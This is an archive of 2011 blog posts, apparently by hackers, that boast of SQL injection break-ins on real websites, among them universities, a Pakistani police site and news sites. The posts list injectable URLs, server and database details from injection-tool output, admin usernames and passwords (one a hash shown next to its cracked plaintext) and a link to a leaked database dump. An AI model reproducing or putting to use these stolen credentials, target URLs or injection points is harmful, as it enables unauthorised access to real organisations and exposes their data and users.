Category Archives: Hacked Websites

Detected Blind SQL Vulnerability in IIT Kharagpur (http://www.iitkgp.ac.in/)


The history of the IIT system dates back to 1946. It is staffed with highly talented professors and students, but their website is vulnerable to Blind SQL Injection, a vulnerability with a high threat level.

Vulnerability description

This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn’t properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Although it is relatively easy to protect against, a large number of web applications remain vulnerable.

This vulnerability affects /xxxx.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

The impact of this vulnerability

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Target:         http://www.iitkgp.ac.in/
Host IP:        203.110.245.243
Web Server:     Apache/2.2.3 (Red Hat)
Powered-by:     PHP/5.1.6
DB Server:     MySQL >=5
Resp. Time(avg):    107 ms
Current User:     rootrt@localhost
Sql Version:     5.0.45
Current DB:     profiles
System User:     rootrt@localhost
Host Name:     www.iitkgp.ac.in
Installation dir:     /usr/


Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakistan (balochistanpolice) http://www.balochistanpolice.gov.pk/page.php?id=3


Target:         http://www.balochistanpolice.gov.pk/page.php?id=3
Host IP:        213.171.219.2
Web Server:     Microsoft-IIS/6.0
Powered-by:     PHP/5.2.6
DB Server:     MSAccess
Resp. Time(avg):    760 ms
Web Root:     c:\php\
Drive:         c:
d: (Drive error! maybe it’s CD-ROM)

 

DB Detection: MSAccess (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
 

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Agencevu (http://www.agencevu.com/stories/index.php?id=1021&p=238)


Target:         http://www.agencevu.com/stories/index.php?id=1021&p=238
Host IP:        91.121.167.130
Web Server:     Apache
DB Server:     MySQL >=5
Resp. Time(avg):    438 ms
Current User:     proxygen@localhost
Sql Version:     5.0.51a-3ubuntu5.8-log
Current DB:     agencevu
System User:     proxygen@localhost
Host Name:     ns202929.ovh.net
Installation dir:     /usr/
Data Bases:     information_schema
abvent
agencevu
backup_renderin
cigraph
galerievu
mysql
oonline
status
store
test-restore


Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakistan hubbardbreeders (http://www.hubbardbreeders.com/news/index.php?id=66)


Target:         http://www.hubbardbreeders.com/news/index.php?id=66
Host IP:        195.78.94.19
Web Server:     Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.0a PHP/5.3.5 with Suhosin-Patch
Powered-by:     PHP/5.3.5
DB Server:     MySQL >=5

Username: Admin

Password: Ecuador


Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakistan HAZARA University (http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2)


Target: http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2
Date: 6/18/2011 2:47:33 PM
DB Detection: MySQL error based (Auto Detected)
Method: GET
Type: String (Auto Detected)
Data Base: c3results
Table: admin
Total Rows: 1

 

id u_name passwrd
123_admin_123 123_hazara_123

 

 

Posted by on June 21, 2011 in Hacked Websites

 

Hacked PAKISTAN Online News (http://www.onlinenews.com.pk/details.php?id=180339)


Target: http://www.onlinenews.com.pk/details.php?id=180339
Host IP: 203.124.43.81
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.8
DB Server: MySQL
Resp. Time(avg): 1150 ms
Current User: onlinenews@localhost
Sql Version: 5.0.45-community-nt
Current DB: onlinenews
System User: onlinenews@localhost
Host Name: host06
Installation dir: C:\Program Files\MySQL\MySQL Server 5.0
DB User: 'onlinenews'@'%'
Data Bases: information_schema
onlinenews

 


Username: Admin

Password: 4bc2cfed02b6bebf99b6646c82cec3b8  (onlineunited507)

Hash: onlineunited507


Posted by on June 21, 2011 in Hacked Websites

 

PAKBUGS Complete DataBase


https://www.box.net/shared/vpgzcxct80ya40dd38cr

 

 

Posted by on June 19, 2011 in Hacked Websites